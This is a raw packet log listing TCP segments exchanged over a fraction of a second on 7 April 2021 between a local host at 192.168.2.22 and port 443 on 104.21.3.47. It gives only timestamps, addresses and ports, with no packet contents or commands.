                                                    Apr 7, 2021 18:47:19.816088915 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.816095114 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.816102028 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.816129923 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.817903996 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.817920923 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.817967892 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.846561909 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.846612930 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.846822023 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.849632025 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.849653959 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.849667072 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.849678040 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.849694014 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.849841118 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.850099087 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.850120068 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.850182056 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.850204945 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.850246906 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.850284100 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.850308895 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.850325108 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.850375891 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.850893974 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.850964069 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.850965023 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.850982904 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.851000071 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.851035118 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.851093054 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.851906061 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.851927996 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.851939917 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.851952076 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.851963997 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.852061033 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.852837086 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.852865934 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.852879047 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.852891922 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.852910995 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.852993011 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.855197906 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855221987 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855246067 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855283022 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855299950 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855479956 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855560064 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855578899 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855613947 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.855633974 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.857115984 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.857188940 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.857203960 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.857212067 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.857218981 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.857225895 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.857486010 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.857517004 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.857597113 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.857620001 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.857731104 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.860394001 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.860416889 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.860439062 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.860522985 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.860925913 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.861644983 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.861669064 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.861682892 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.861748934 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.862559080 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.862579107 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.862637997 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.862638950 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.862683058 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.864448071 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864469051 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864483118 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864502907 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864523888 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864545107 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.864582062 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.864588022 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.864650965 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864692926 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.864717007 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864758015 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.864861965 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864881992 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864907980 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.864928961 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.864958048 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.864974022 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.865000010 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.865010977 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.865065098 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.865159988 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.865808964 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.865828991 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.865844965 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.865859032 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.865864038 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.865875006 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.865880966 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.865889072 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.865904093 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.865917921 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.866508961 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.866571903 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.866647005 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.866663933 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.866682053 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.866692066 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.866704941 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.866719007 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.866720915 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.866756916 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.867290974 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.867503881 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.867542028 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.867558956 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.867559910 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.867578030 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.867588043 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.867743969 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.867759943 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.867784023 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.867796898 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.868246078 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.868305922 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.868309975 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.868326902 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.868356943 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.868362904 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.868367910 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.868392944 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.868402004 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.868432045 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.869031906 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.869097948 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.869165897 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.869182110 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.869205952 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.869220018 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.869240999 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.869277000 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.869282007 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.869299889 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.869318962 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.869329929 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.869767904 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.871577978 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.871598959 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.871642113 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.871659040 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.871674061 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.871675968 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.871691942 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.871695042 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.871714115 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.875832081 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.875854015 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.875866890 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.875880003 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.875899076 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.875931025 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.876019955 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.876352072 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.876419067 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.876523018 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.876540899 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.876557112 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.876564026 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.876573086 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.876580954 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.876586914 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.876590014 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.876597881 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.876619101 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.877280951 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.877304077 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.877319098 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.877346992 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.877358913 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.877587080 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.877609015 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.877626896 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.877635002 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.877645969 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.877655029 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.878604889 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.878645897 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.878679037 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.878688097 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.878709078 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.878727913 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.878742933 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.878773928 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.878793001 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.879390955 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.879412889 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.879426003 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.879486084 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.879611969 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.879636049 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.879657030 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.879667997 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.879695892 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.879734993 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.881695986 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.881722927 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.881740093 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.881759882 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.881778002 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.881810904 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.881834984 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.881917953 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.881968021 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.883698940 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.883725882 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.883742094 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.883779049 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.883793116 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.883807898 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.883843899 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.883894920 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.883939981 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.883944035 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.883974075 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.883980989 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.884007931 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.884015083 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.884032011 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.884048939 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.884063005 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.885271072 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.885293961 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.885313034 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.885329962 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.885344982 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.885359049 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.885374069 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.885376930 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.885379076 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.885426998 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.885464907 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.885916948 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.888477087 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.888500929 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.888534069 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.888581991 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.888598919 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.888613939 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.888622999 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.888633966 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.888648033 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.889962912 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.890042067 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.890048981 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.890081882 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.890161037 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.890182018 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.890192986 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.890208960 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.892914057 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.892977953 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.892997980 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893014908 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893024921 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893043041 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893059969 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893063068 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893074989 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893080950 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893091917 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893099070 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893111944 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893115997 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893127918 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893142939 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893177986 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893209934 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893261909 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893294096 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893332005 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893362999 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893436909 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893475056 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893786907 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893806934 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.893831015 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.893841982 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.894153118 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.894191027 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.894217968 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.894258976 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.894259930 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.894290924 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.894577026 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.894598961 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.894619942 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.894629955 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.894637108 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.894666910 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.895848989 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.895915031 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.895929098 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.895955086 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.895963907 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.896140099 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.896157980 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.896173954 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.896179914 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.896190882 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.896197081 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.896205902 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.896228075 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.897363901 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.897452116 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.897532940 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.897552967 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.897569895 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.897579908 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.897588968 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.897591114 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.897604942 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.897604942 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.897619963 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.897641897 CEST49167443192.168.2.22104.21.3.47
